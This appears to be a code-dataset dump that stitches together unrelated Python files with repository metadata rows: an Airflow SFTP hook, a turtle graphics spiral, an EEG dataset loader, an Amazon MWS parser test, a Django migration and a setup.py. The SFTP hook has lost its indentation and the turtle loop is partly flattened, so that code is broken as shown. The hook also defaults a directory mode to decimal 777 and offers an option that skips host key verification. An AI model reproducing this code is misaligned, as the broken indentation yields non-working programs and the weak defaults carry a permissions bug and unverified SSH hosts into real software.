- In contrast with FTPHook describe_directory only returns size, type and
modify. It doesn't return unix.owner, unix.mode, perm, unix.group and
unique.
- retrieve_file and store_file only take a local full path and not a
buffer.
- If no mode is passed to create_directory it will be created with 777
permissions.
    Errors that may occur throughout should be handled downstream.
:param sftp_conn_id: The :ref:`sftp connection id<howto/connection:sftp>`
:type sftp_conn_id: str
"""
conn_name_attr = 'ftp_conn_id'
default_conn_name = 'sftp_default'
conn_type = 'sftp'
hook_name = 'SFTP'
@staticmethod
def get_ui_field_behaviour() -> Dict:
return {
"hidden_fields": ['schema'],
"relabeling": {
'login': 'Username',
},
}
def __init__(self, ftp_conn_id: str = 'sftp_default', *args, **kwargs) -> None:
kwargs['ssh_conn_id'] = ftp_conn_id
super().__init__(*args, **kwargs)
self.conn = None
self.private_key_pass = None
self.ciphers = None
# Fail for unverified hosts, unless this is explicitly allowed
self.no_host_key_check = False
if self.ssh_conn_id is not None:
conn = self.get_connection(self.ssh_conn_id)
if conn.extra is not None:
extra_options = conn.extra_dejson
# For backward compatibility
# TODO: remove in Airflow 2.1
import warnings
if 'private_key_pass' in extra_options:
warnings.warn(
'Extra option `private_key_pass` is deprecated.'
'Please use `private_key_passphrase` instead.'
'`private_key_passphrase` will precede if both options are specified.'
'The old option `private_key_pass` will be removed in Airflow 2.1',
DeprecationWarning,
stacklevel=2,
)
self.private_key_pass = extra_options.get(
'private_key_passphrase', extra_options.get('private_key_pass')
)
if 'ignore_hostkey_verification' in extra_options:
warnings.warn(
'Extra option `ignore_hostkey_verification` is deprecated.'
'Please use `no_host_key_check` instead.'
'This option will be removed in Airflow 2.1',
DeprecationWarning,
stacklevel=2,
)
self.no_host_key_check = (
str(extra_options['ignore_hostkey_verification']).lower() == 'true'
)
if 'no_host_key_check' in extra_options:
self.no_host_key_check = str(extra_options['no_host_key_check']).lower() == 'true'
if 'ciphers' in extra_options:
self.ciphers = extra_options['ciphers']
@tenacity.retry(
stop=tenacity.stop_after_delay(10),
wait=tenacity.wait_exponential(multiplier=1, max=10),
retry=tenacity.retry_if_exception_type(SSHException),
reraise=True,
)
def get_conn(self) -> pysftp.Connection:
"""Returns an SFTP connection object"""
if self.conn is None:
cnopts = pysftp.CnOpts()
if self.no_host_key_check:
cnopts.hostkeys = None
else:
if self.host_key is not None:
cnopts.hostkeys.add(self.remote_host, self.host_key.get_name(), self.host_key)
else:
pass # will fallback to system host keys if none explicitly specified in conn extra
cnopts.compression = self.compress
cnopts.ciphers = self.ciphers
conn_params = {
'host': self.remote_host,
'port': self.port,
'username': self.username,
'cnopts': cnopts,
}
if self.password and self.password.strip():
conn_params['password'] = self.password
if self.pkey:
conn_params['private_key'] = self.pkey
elif self.key_file:
conn_params['private_key'] = self.key_file
if self.private_key_pass:
conn_params['private_key_pass'] = self.private_key_pass
self.conn = pysftp.Connection(**conn_params)
return self.conn
def close_conn(self) -> None:
"""Closes the connection"""
if self.conn is not None:
self.conn.close()
self.conn = None
def describe_directory(self, path: str) -> Dict[str, Dict[str, str]]:
"""
Returns a dictionary of {filename: {attributes}} for all files
on the remote system (where the MLSD command is supported).
:param path: full path to the remote directory
:type path: str
"""
conn = self.get_conn()
flist = conn.listdir_attr(path)
files = {}
for f in flist:
modify = datetime.datetime.fromtimestamp(f.st_mtime).strftime('%Y%m%d%H%M%S')
files[f.filename] = {
'size': f.st_size,
'type': 'dir' if stat.S_ISDIR(f.st_mode) else 'file',
'modify': modify,
}
return files
def list_directory(self, path: str) -> List[str]:
"""
Returns a list of files on the remote system.
:param path: full path to the remote directory to list
:type path: str
"""
conn = self.get_conn()
files = conn.listdir(path)
return files
def create_directory(self, path: str, mode: int = 777) -> None:
"""
Creates a directory on the remote system.
:param path: full path to the remote directory to create
:type path: str
:param mode: int representation of octal mode for directory
"""
conn = self.get_conn()
conn.makedirs(path, mode)
def delete_directory(self, path: str) -> None:
"""
Deletes a directory on the remote system.
:param path: full path to the remote directory to delete
:type path: str
"""
conn = self.get_conn()
conn.rmdir(path)
def retrieve_file(self, remote_full_path: str, local_full_path: str) -> None:
"""
Transfers the remote file to a local location.
If local_full_path is a string path, the file will be put
at that location
:param remote_full_path: full path to the remote file
:type remote_full_path: str
:param local_full_path: full path to the local file
:type local_full_path: str
"""
conn = self.get_conn()
conn.get(remote_full_path, local_full_path)
def store_file(self, remote_full_path: str, local_full_path: str) -> None:
"""
Transfers a local file to the remote location.
If local_full_path_or_buffer is a string path, the file will be read
from that location
:param remote_full_path: full path to the remote file
:type remote_full_path: str
:param local_full_path: full path to the local file
:type local_full_path: str
"""
conn = self.get_conn()
conn.put(local_full_path, remote_full_path)
def delete_file(self, path: str) -> None:
"""
Removes a file on the FTP Server
:param path: full path to the remote file
:type path: str
"""
conn = self.get_conn()
conn.remove(path)
def get_mod_time(self, path: str) -> str:
"""
Returns modification time.
:param path: full path to the remote file
:type path: str
"""
conn = self.get_conn()
ftp_mdtm = conn.stat(path).st_mtime
return datetime.datetime.fromtimestamp(ftp_mdtm).strftime('%Y%m%d%H%M%S')
def path_exists(self, path: str) -> bool:
"""
Returns True if a remote entity exists
:param path: full path to the remote file or directory
:type path: str
"""
conn = self.get_conn()
return conn.exists(path)
@staticmethod
def _is_path_match(path: str, prefix: Optional[str] = None, delimiter: Optional[str] = None) -> bool:
"""
Return True if given path starts with prefix (if set) and ends with delimiter (if set).
:param path: path to be checked
:type path: str
:param prefix: if set path will be checked is starting with prefix
:type prefix: str
:param delimiter: if set path will be checked is ending with suffix
:type delimiter: str
:return: bool
"""
if prefix is not None and not path.startswith(prefix):
return False
if delimiter is not None and not path.endswith(delimiter):
return False
return True
def get_tree_map(
self, path: str, prefix: Optional[str] = None, delimiter: Optional[str] = None
) -> Tuple[List[str], List[str], List[str]]:
"""
Return tuple with recursive lists of files, directories and unknown paths from given path.
It is possible to filter results by giving prefix and/or delimiter parameters.
:param path: path from which tree will be built
:type path: str
:param prefix: if set paths will be added if start with prefix
:type prefix: str
:param delimiter: if set paths will be added if end with delimiter
:type delimiter: str
:return: tuple with list of files, dirs and unknown items
:rtype: Tuple[List[str], List[str], List[str]]
"""
conn = self.get_conn()
files, dirs, unknowns = [], [], [] # type: List[str], List[str], List[str]
def append_matching_path_callback(list_):
return lambda item: list_.append(item) if self._is_path_match(item, prefix, delimiter) else None
conn.walktree(
remotepath=path,
fcallback=append_matching_path_callback(files),
dcallback=append_matching_path_callback(dirs),
ucallback=append_matching_path_callback(unknowns),
recurse=True,
)
return files, dirs, unknowns
def test_connection(self) -> Tuple[bool, str]:
"""Test the SFTP connection by checking if remote entity '/some/path' exists"""
try:
self.path_exists('/some/path')
return True, "Connection successfully tested"
except Exception as e:
return False, str(e)
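# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# A minimal, hypothetical way to use SFTPHook from a task. The connection id
# 'sftp_default' and the remote path '/upload' are assumptions for illustration.
def _example_sftp_hook_usage():
    hook = SFTPHook(ftp_conn_id='sftp_default')
    try:
        if hook.path_exists('/upload'):
            files, dirs, unknowns = hook.get_tree_map('/upload', delimiter='.csv')
            for remote_path in files:
                print(remote_path, hook.get_mod_time(remote_path))
    finally:
        hook.close_conn()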
| 36.377644
| 108
| 0.59912
|
b15826373d727f9098e172af154d12253dad56b6
| 527
|
py
|
Python
|
graphics.py
|
rifatkhan512/turtle
|
1ed9b2aaaddb2c4839d48c1e203d00dfd03458ba
|
[
"MIT"
] | null | null | null |
graphics.py
|
rifatkhan512/turtle
|
1ed9b2aaaddb2c4839d48c1e203d00dfd03458ba
|
[
"MIT"
] | null | null | null |
graphics.py
|
rifatkhan512/turtle
|
1ed9b2aaaddb2c4839d48c1e203d00dfd03458ba
|
[
"MIT"
] | null | null | null |
import turtle as tt
import random
wn=tt.Screen()
wn.bgcolor("#333333")
size=0
tt.speed(0)
# Draw a spiral: each of the 185 segments gets a random hex colour.
for i in range(185):
    # Build a random colour string such as "#a3f09b".
    rn = "#"
    for _ in range(6):
        x = random.randint(0, 2)
        if x:
            x = random.randint(0, 9)
            rn += str(x)
        else:
            x = random.randint(0, 5)
            ami = "abcdef"
            rn += ami[x]
colour=rn
print(rn)
tt.color(colour)
tt.forward(size)
tt.right(71.5)
size+=3
| 19.518519
| 37
| 0.428843
|
e04e90e53d00381e68cf5036fc35a6b509c911ff
| 2,115
|
py
|
Python
|
python_code/dataset.py
|
FabioBCI/BCI_WEB
|
94a67e480bf573d6277c8104b4b48aa5171b84f6
|
[
"MIT"
] | null | null | null |
python_code/dataset.py
|
FabioBCI/BCI_WEB
|
94a67e480bf573d6277c8104b4b48aa5171b84f6
|
[
"MIT"
] | null | null | null |
python_code/dataset.py
|
FabioBCI/BCI_WEB
|
94a67e480bf573d6277c8104b4b48aa5171b84f6
|
[
"MIT"
] | null | null | null |
from matplotlib import pyplot as plt
import numpy as np
import scipy.io
class dataset():
def __init__(self):
        self.X = []  # Data
        self.Y = []  # Labels
self.fm = 0
def generateSignal(self, amplitud, tamano):
y = 0
result = []
x = np.linspace(0, tamano, tamano)
for _ in x:
result.append(y)
if not amplitud == 0:
y += (np.random.normal(scale=1)/10)*amplitud
else:
y += (np.random.normal(scale=1)/10)
result = np.array(result)
return result
def load_random_signals(self, num_clases, fm, num_trials, num_channels, amplitud, tamano):
        # Generate the signals randomly
self.fm = fm
self.X = []
self.Y = []
self.X = np.zeros((num_trials, num_channels, tamano))
for trial in range(num_trials):
self.Y.extend([np.random.randint(0, num_clases)])
for ch in range(num_channels):
self.X[trial,ch,:] = self.generateSignal(amplitud, tamano)
self.X = np.asarray(self.X)
self.Y = np.asarray(self.Y)
return self.X, self.Y
def load_IIIa(self, sujeto):
directory = '../db/IIIa/'
if sujeto == 'k3b':
directory += 'k3b.mat'
elif sujeto == 'k6b':
directory += 'k6b.mat'
elif sujeto == 'l1b':
directory += 'l1b.mat'
data = scipy.io.loadmat(directory)
datos = data['datos']
signal = datos['x_train']
labels = datos['y_train']
self.fm = 250
self.X = np.asarray(signal[0][0])
labels = np.asarray(labels[0][0])
self.Y = []
for l in labels:
self.Y.append(l-1)
self.Y = np.asarray(self.Y[0])
#self.Y = np.transpose(self.Y)
#self.Y = np.transpose(labels)
        #self.Y = self.Y - 1  # To have the labels from 0 to n-1
return self.X, self.Y
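# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# Generating a small synthetic random-walk dataset with the class above.
# All argument values are illustrative assumptions.
def _example_dataset_usage():
    ds = dataset()
    X, Y = ds.load_random_signals(num_clases=2, fm=250, num_trials=10,
                                  num_channels=8, amplitud=1, tamano=1000)
    print(X.shape)  # (10, 8, 1000): trials x channels x samples
    print(Y.shape)  # (10,): one class label per trial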
| 28.2
| 95
| 0.496454
|
a1cf9c41e0e4f8c46ee67fbbdac8c3d130f8cb25
| 1,383
|
py
|
Python
|
tests/parsers/products/test_GetMatchingProductForIdResult.py
|
Tberdy/python-amazon-mws-tools
|
2925118ce113851a2d8db98ad7f99163154f4151
|
[
"Unlicense"
] | 9
|
2017-03-28T12:58:36.000Z
|
2020-03-02T14:42:32.000Z
|
tests/parsers/products/test_GetMatchingProductForIdResult.py
|
Tberdy/python-amazon-mws-tools
|
2925118ce113851a2d8db98ad7f99163154f4151
|
[
"Unlicense"
] | 5
|
2017-01-05T19:36:18.000Z
|
2021-12-13T19:43:42.000Z
|
tests/parsers/products/test_GetMatchingProductForIdResult.py
|
Tberdy/python-amazon-mws-tools
|
2925118ce113851a2d8db98ad7f99163154f4151
|
[
"Unlicense"
] | 5
|
2017-02-15T17:29:02.000Z
|
2019-03-06T07:30:55.000Z
|
from unittest import TestCase
from unittest import TestSuite
from unittest import main
from unittest import makeSuite
from mwstools.parsers.products import GetMatchingProductForIdResult
class TestGetMatchingProductForIdResult(TestCase):
body = """
<GetMatchingProductForIdResult Id="082676082658" IdType="UPC" status="Success">
<Products xmlns="http://mws.amazonservices.com/schema/Products/2011-10-01"
xmlns:ns2="http://mws.amazonservices.com/schema/Products/2011-10-01/default.xsd">
<Product>
<Empty />
</Product>
</Products>
</GetMatchingProductForIdResult>
"""
def setUp(self):
self.parser = GetMatchingProductForIdResult.load(self.body)
def test_id_(self):
self.assertEqual(self.parser.id_, '082676082658')
def test_id_type(self):
self.assertEqual(self.parser.id_type, 'UPC')
def test_status(self):
self.assertEqual(self.parser.status, 'Success')
def test_is_success(self):
self.assertTrue(self.parser.is_success())
def test_products(self):
self.assertEqual(len(self.parser.products()), 1)
__all__ = [
TestGetMatchingProductForIdResult
]
def suite():
s = TestSuite()
for a in __all__:
s.addTest(makeSuite(a))
return s
if __name__ == '__main__':
main(defaultTest='suite')
| 24.696429
| 99
| 0.67462
|
11c473179412bda0914c3544cded68fcfdc0cc7d
| 1,929
|
py
|
Python
|
train.py
|
pasquini-dario/InterpretablePPSM
|
eb2732bb2e6f7e53827a2b0a2f46c9a4d84c42d8
|
[
"Apache-2.0"
] | 2
|
2020-04-21T09:16:11.000Z
|
2021-02-19T06:47:42.000Z
|
train.py
|
pasquini-dario/InterpretablePPSM
|
eb2732bb2e6f7e53827a2b0a2f46c9a4d84c42d8
|
[
"Apache-2.0"
] | 2
|
2021-10-06T13:23:10.000Z
|
2021-10-09T04:38:31.000Z
|
train.py
|
pasquini-dario/InterpretablePPSM
|
eb2732bb2e6f7e53827a2b0a2f46c9a4d84c42d8
|
[
"Apache-2.0"
] | 2
|
2020-11-13T12:40:43.000Z
|
2021-10-07T12:12:46.000Z
|
MODEL_OUT = 'HOME/MODELs'
LOG_OUT = 'HOME/LOGs'
import tensorflow as tf
gpus = tf.config.experimental.list_physical_devices('GPU')
import os, sys, gin
import modelCNN as model
import input_pipeline
from trainer import Trainer
import architectureCNN as architecture
def basenameNoExt(path, sep='.'):
name = os.path.basename(path)
return name.split(sep)[0]
@gin.configurable
def setup(name, MODEL_TYPE, home_train, home_tests, max_epochs, log_freq, MAX_LEN, hparams):
check_train_dir = os.path.join(LOG_OUT, name)
check_test_dir = os.path.join(check_train_dir, 'eval')
MAX_MASK = hparams['masked_chars']
INCLUDE_END_SYMBOL = hparams['append_end']
train_batch, vocab_size, cm = input_pipeline.makeIterInput(home_train, hparams['batch_size'], MAX_MASK, INCLUDE_END_SYMBOL, MAX_LEN)
optimizer = tf.keras.optimizers.Adam(hparams['learning_rate'])
f, train_step, predict_step = model.make_train_predict(hparams, optimizer, vocab_size, MAX_LEN)
model_mem_footprint = (f.count_params() * 4) // (10 ** 6)
print("\t MODEL_MEM: %dMB" % model_mem_footprint)
t = Trainer(
f,
MAX_LEN,
cm,
train_step,
predict_step,
max_epochs,
train_batch,
home_tests,
optimizer,
check_train_dir,
check_test_dir,
1,
log_freq,
hparams,
)
print("TRAIN")
t()
print("EXPORT")
mpath = os.path.join(MODEL_OUT, name+'.h5')
f.save(mpath, overwrite=True, include_optimizer=False, save_format='h5')
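# Example gin bindings for setup() (hypothetical values; the parameter names
# follow the @gin.configurable signature above, and the hparams keys are the
# ones read in this file -- other keys may be required by the model/pipeline):
#   setup.MODEL_TYPE = 'CNN'
#   setup.home_train = 'HOME/DATA/train'
#   setup.home_tests = 'HOME/DATA/tests'
#   setup.max_epochs = 10
#   setup.log_freq = 100
#   setup.MAX_LEN = 16
#   setup.hparams = {'batch_size': 512, 'learning_rate': 0.001,
#                    'masked_chars': 4, 'append_end': True}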
if __name__ == '__main__':
try:
conf_path = sys.argv[1]
    except IndexError:
print("USAGE: conf_file_gin")
sys.exit(1)
gin.parse_config_file(conf_path)
name = basenameNoExt(conf_path)
print("Name: ", name)
setup(name)
| 25.72
| 136
| 0.62675
|
52594270776daa8f95eea39fc4298db6eeb68c12
| 15,925
|
py
|
Python
|
semesterpage/migrations/0001_initial.py
|
JakobGM/WikiLinks
|
5743b1d4c3fefa66fcaa4d283436d2a3f0490604
|
[
"MIT"
] | 6
|
2017-08-12T09:55:06.000Z
|
2019-09-03T08:05:21.000Z
|
semesterpage/migrations/0001_initial.py
|
JakobGM/WikiLinks
|
5743b1d4c3fefa66fcaa4d283436d2a3f0490604
|
[
"MIT"
] | 57
|
2017-08-11T23:05:07.000Z
|
2022-03-11T23:32:12.000Z
|
semesterpage/migrations/0001_initial.py
|
JakobGM/WikiLinks
|
5743b1d4c3fefa66fcaa4d283436d2a3f0490604
|
[
"MIT"
] | 1
|
2017-09-27T15:31:15.000Z
|
2017-09-27T15:31:15.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-08-05 00:21
from __future__ import unicode_literals
import autoslug.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import sanitizer.models
import semesterpage.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Contributor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('access_level', models.SmallIntegerField(choices=[(0, 'Ingen tilgang'), (1, 'Opprettede fag'), (2, 'Kun semesteret'), (3, 'Hele hovedprofilen'), (4, 'Hele studieprogrammet')], default=1, help_text='Gir muligheten til å endre på lenker o.l. knyttet til semesteret spesifisert nedenfor.', verbose_name='tilgangsnivå')),
],
options={
'verbose_name_plural': 'bidragsytere',
'verbose_name': 'bidragsyter',
},
),
migrations.CreateModel(
name='Course',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_name', models.CharField(help_text='F.eks. "Prosedyre- og Objektorientert Programmering"', max_length=60, unique=True, verbose_name='fullt navn')),
('display_name', models.CharField(help_text='F.eks. "C++"', max_length=60, verbose_name='visningsnavn')),
('logo', models.FileField(blank=True, help_text='Bildet vises over alle lenkene knyttet til faget. Bør være kvadratisk for å unngå uheldige skaleringseffekter.', null=True, upload_to=semesterpage.models.upload_path)),
('homepage', models.URLField(help_text='F.eks. "http://www.phys.ntnu.no/fysikkfag/". Denne lenken kan besøkes ved å trykke på ikonet til faget.', verbose_name='Fagets hjemmeside')),
('course_code', models.CharField(help_text='F.eks. "TDT4102"', max_length=10, unique=True, verbose_name='emnekode')),
('contributors', models.ManyToManyField(blank=True, help_text='Bidragsytere som har redigeringstilgang til faget.', related_name='courses', to='semesterpage.Contributor')),
],
options={
'ordering': ['display_name'],
'verbose_name_plural': 'fag',
'verbose_name': 'fag',
},
),
migrations.CreateModel(
name='CourseLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.URLField(help_text='F.eks. "http://www.phys.ntnu.no/fysikkfag/gamleeksamener.html"', verbose_name='URL')),
('category', models.CharField(blank=True, choices=[('tasks.svg', 'Øvinger og prosjekter'), ('solutions.svg', 'Løsningsforslag'), ('videos.svg', 'Videoforelesninger'), ('timetable.svg', 'Framdrifts- og timeplaner'), ('syllabus.svg', 'Pensum'), ('formulas.svg', 'Formelark'), ('exams.svg', 'Eksamener'), ('facebook.svg', 'Facebook'), ('info.svg', 'Informasjon'), ('important_info.svg', 'Viktig informasjon'), ('ntnu.svg', 'NTNU-lenker'), ('wikipendium.svg', 'Wikipendium'), ('book.svg', 'Pensumbok'), ('quiz.svg', 'Quiz og punktlister'), ('software.svg', 'Programvare')], default=None, help_text='F.eks. "Løsningsforslag". Valget bestemmer hvilket "mini-ikon" som plasseres ved siden av lenken.', max_length=60, null=True, verbose_name='Kateogri')),
('order', models.PositiveSmallIntegerField(default=0, help_text='Bestemmer hvilken rekkefølge lenkene skal vises i. Lavest kommer først.', verbose_name='rekkefølge')),
('title', sanitizer.models.SanitizedCharField(help_text='F.eks "Gamle eksamenssett"', max_length=100, verbose_name='tittel')),
('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='links', to='semesterpage.Course', verbose_name='fag')),
],
options={
'ordering': ('order',),
'abstract': False,
'verbose_name_plural': 'lenker',
'verbose_name': 'lenke',
},
),
migrations.CreateModel(
name='CustomLinkCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=60, unique=True, verbose_name='Egendefinert kategori')),
('thumbnail', models.FileField(blank=True, upload_to=semesterpage.models.upload_path, verbose_name='ikon for kategori')),
],
options={
'verbose_name_plural': 'lenkekategorier',
'verbose_name': 'lenkekategori',
},
),
migrations.CreateModel(
name='MainProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_name', models.CharField(help_text='F.eks. "Industriell matematikk"', max_length=60, verbose_name='fullt navn')),
('display_name', models.CharField(help_text='F.eks. "InMat"', max_length=60, verbose_name='visningsnavn / kallenavn')),
('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='display_name', unique_with=('study_program',))),
],
options={
'ordering': ['display_name'],
'verbose_name_plural': 'hovedprofiler',
'verbose_name': 'hovedprofil',
},
),
migrations.CreateModel(
name='Options',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('homepage', models.CharField(blank=True, help_text='Du kan besøke din personlige semesterside på kokekunster.no/hjemmesidenavn eller hjemmesidenavn.kokekunster.no. Der dukker alle fagene i semesteret du velger nedenfor opp, eller så kan du også velge din egen fagkombinasjon.', max_length=60, null=True, unique=True, verbose_name='hjemmesidenavn')),
('homepage_slug', autoslug.fields.AutoSlugField(always_update=True, blank=True, editable=False, null=True, populate_from='homepage', unique=True)),
('calendar_name', models.CharField(blank=True, default=None, help_text='Tast inn ditt kalendernavn på ntnu.1024.no.', max_length=60, null=True, verbose_name='1024-kalendernavn')),
('self_chosen_courses', models.ManyToManyField(blank=True, default=None, help_text='Hvis du ikke går et ordinært semester, og heller har lyst å velge dine egne fag.', related_name='students', to='semesterpage.Course', verbose_name='fag')),
],
options={
'ordering': ('user__username',),
'abstract': False,
'verbose_name_plural': 'instillinger',
'verbose_name': 'instillinger',
},
),
migrations.CreateModel(
name='ResourceLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.URLField(help_text='F.eks. "http://www.phys.ntnu.no/fysikkfag/gamleeksamener.html"', verbose_name='URL')),
('category', models.CharField(blank=True, choices=[('tasks.svg', 'Øvinger og prosjekter'), ('solutions.svg', 'Løsningsforslag'), ('videos.svg', 'Videoforelesninger'), ('timetable.svg', 'Framdrifts- og timeplaner'), ('syllabus.svg', 'Pensum'), ('formulas.svg', 'Formelark'), ('exams.svg', 'Eksamener'), ('facebook.svg', 'Facebook'), ('info.svg', 'Informasjon'), ('important_info.svg', 'Viktig informasjon'), ('ntnu.svg', 'NTNU-lenker'), ('wikipendium.svg', 'Wikipendium'), ('book.svg', 'Pensumbok'), ('quiz.svg', 'Quiz og punktlister'), ('software.svg', 'Programvare')], default=None, help_text='F.eks. "Løsningsforslag". Valget bestemmer hvilket "mini-ikon" som plasseres ved siden av lenken.', max_length=60, null=True, verbose_name='Kateogri')),
('order', models.PositiveSmallIntegerField(default=0, help_text='Bestemmer hvilken rekkefølge lenkene skal vises i. Lavest kommer først.', verbose_name='rekkefølge')),
('title', sanitizer.models.SanitizedCharField(help_text='F.eks "Wolfram Alpha"', max_length=100, verbose_name='tittel')),
('custom_category', models.ForeignKey(blank=True, default=None, help_text='Hvis du ønsker å bruke et egendefinert "mini-ikon".', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='links', to='semesterpage.CustomLinkCategory', verbose_name='(Egendefinert kategori)')),
],
options={
'ordering': ('order',),
'abstract': False,
'verbose_name_plural': 'ressurslenker',
'verbose_name': 'ressurslenke',
},
),
migrations.CreateModel(
name='ResourceLinkList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_name', models.CharField(help_text='F.eks. "Prosedyre- og Objektorientert Programmering"', max_length=60, unique=True, verbose_name='fullt navn')),
('display_name', models.CharField(help_text='F.eks. "C++"', max_length=60, verbose_name='visningsnavn')),
('logo', models.FileField(blank=True, help_text='Bildet vises over alle lenkene knyttet til faget. Bør være kvadratisk for å unngå uheldige skaleringseffekter.', null=True, upload_to=semesterpage.models.upload_path)),
('homepage', models.URLField(help_text='F.eks. "http://www.phys.ntnu.no/fysikkfag/". Denne lenken kan besøkes ved å trykke på ikonet til faget.', verbose_name='Fagets hjemmeside')),
('default', models.BooleanField(default=False, help_text='Skal denne ressurslenkelisten brukes i alle studieprogram som ikke har satt sine egendefinerte ressurslenkelister?', verbose_name='standard ressurslenkeliste')),
('order', models.PositiveSmallIntegerField(default=0, help_text='Bestemmer hvilken rekkefølge ressurslenkelistene skal vises i. Lavest kommer først.', verbose_name='Rekkefølge')),
],
options={
'ordering': ['order'],
'verbose_name_plural': 'Ressurslenkelister',
'verbose_name': 'Ressurslenkeliste',
},
),
migrations.CreateModel(
name='Semester',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('number', models.PositiveSmallIntegerField(help_text='F.eks. "2"', verbose_name='semesternummer')),
('published', models.BooleanField(default=False, help_text='Semesteret dukker ikke opp i navigasjonsbaren før det er publisert, men det er fortsatt mulig å besøke semesteret manuelt (URL: kokekunster.no/studieprogram/hovedprofil/semesternummer) for å teste resultatet før du publiserer.', verbose_name='publisert')),
('main_profile', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='semesters', to='semesterpage.MainProfile', verbose_name='hovedprofil')),
],
options={
'ordering': ['main_profile__display_name', 'number'],
'verbose_name_plural': 'semestere',
'verbose_name': 'semester',
},
),
migrations.CreateModel(
name='StudyProgram',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_name', models.CharField(help_text='F.eks. "Fysikk og matematikk"', max_length=60, verbose_name='fullt navn')),
('display_name', models.CharField(help_text='F.eks. "Fysmat"', max_length=60, verbose_name='visningsnavn / kallenavn')),
('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='display_name', unique=True)),
('has_archive', models.BooleanField(default=False, help_text='Huk av hvis studieprogrammet har filer i arkivet på kokekunster.no/arkiv.', verbose_name='har arkiv')),
('published', models.BooleanField(default=False, help_text='Studieprogrammet dukker ikke opp i studieprogramlisten i navigasjonsbaren før det er publisert, men det er fortsatt mulig å besøke studieprogrammet manuelt (URL: visningsnavn.kokekunster.no) for å teste resultatet før du publiserer.', verbose_name='publisert')),
],
options={
'ordering': ['display_name'],
'verbose_name_plural': 'studieprogram',
'verbose_name': 'studieprogram',
},
),
migrations.AddField(
model_name='semester',
name='study_program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='semesters', to='semesterpage.StudyProgram', verbose_name='studieprogram'),
),
migrations.AddField(
model_name='resourcelinklist',
name='study_programs',
field=models.ManyToManyField(blank=True, related_name='_resource_link_lists', to='semesterpage.StudyProgram', verbose_name='studieprogram'),
),
migrations.AddField(
model_name='resourcelink',
name='resource_link_list',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='links', to='semesterpage.ResourceLinkList', verbose_name='ressurslenkeliste'),
),
migrations.AddField(
model_name='options',
name='self_chosen_semester',
field=models.ForeignKey(blank=True, default=None, help_text='Semesteret du for øyeblikket går.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='students', to='semesterpage.Semester', verbose_name='semester'),
),
migrations.AddField(
model_name='options',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='options', to=settings.AUTH_USER_MODEL, verbose_name='bruker'),
),
migrations.AddField(
model_name='mainprofile',
name='study_program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='main_profiles', to='semesterpage.StudyProgram', verbose_name='studieprogram'),
),
migrations.AddField(
model_name='course',
name='semesters',
field=models.ManyToManyField(blank=True, help_text='Hvis du lager et fag for deg selv, så kan du bare hoppe over dette valget.', related_name='courses', to='semesterpage.Semester', verbose_name='semestre'),
),
migrations.AddField(
model_name='contributor',
name='semester',
field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='contributors', to='semesterpage.Semester', verbose_name='bidragsytersemester'),
),
migrations.AddField(
model_name='contributor',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='contributor', to=settings.AUTH_USER_MODEL, verbose_name='bruker'),
),
]
| 72.716895
| 763
| 0.643893
|
2a5626f84b3255e38bba4b98d88371caac376d1e
| 885
|
py
|
Python
|
setup.py
|
amercader/munibot
|
8ee6d0449e41aa3cb1231f7855d95730ab567f8f
|
[
"MIT"
] | 4
|
2020-12-27T16:43:27.000Z
|
2021-10-02T11:35:08.000Z
|
setup.py
|
amercader/munibot
|
8ee6d0449e41aa3cb1231f7855d95730ab567f8f
|
[
"MIT"
] | 3
|
2020-12-13T14:22:08.000Z
|
2021-04-04T21:55:11.000Z
|
setup.py
|
amercader/munibot
|
8ee6d0449e41aa3cb1231f7855d95730ab567f8f
|
[
"MIT"
] | 2
|
2021-01-11T22:15:38.000Z
|
2021-01-12T09:08:27.000Z
|
import setuptools
with open("README.md", "r") as f:
long_description = f.read()
with open("requirements.txt", "r") as f:
install_requires = f.readlines()
setuptools.setup(
name="munibot",
version="0.0.4",
author="Adrià Mercader",
author_email="amercadero@gmail.com",
description="A Twitter bot that tweets aerial imagery pictures of municipalities",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/amercader/munibot",
packages=setuptools.find_packages(),
install_requires=install_requires,
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires=">=3.6",
entry_points={
"console_scripts": ["munibot=munibot.munibot:main"],
},
)
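# Typical usage (not part of the original file): install locally with
#   pip install .
# which exposes the `munibot` console script declared in entry_points above.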
| 29.5
| 86
| 0.672316
|
1ae5d5f3d14f715282d13916d4d43c40937a59e1
| 35,469
|
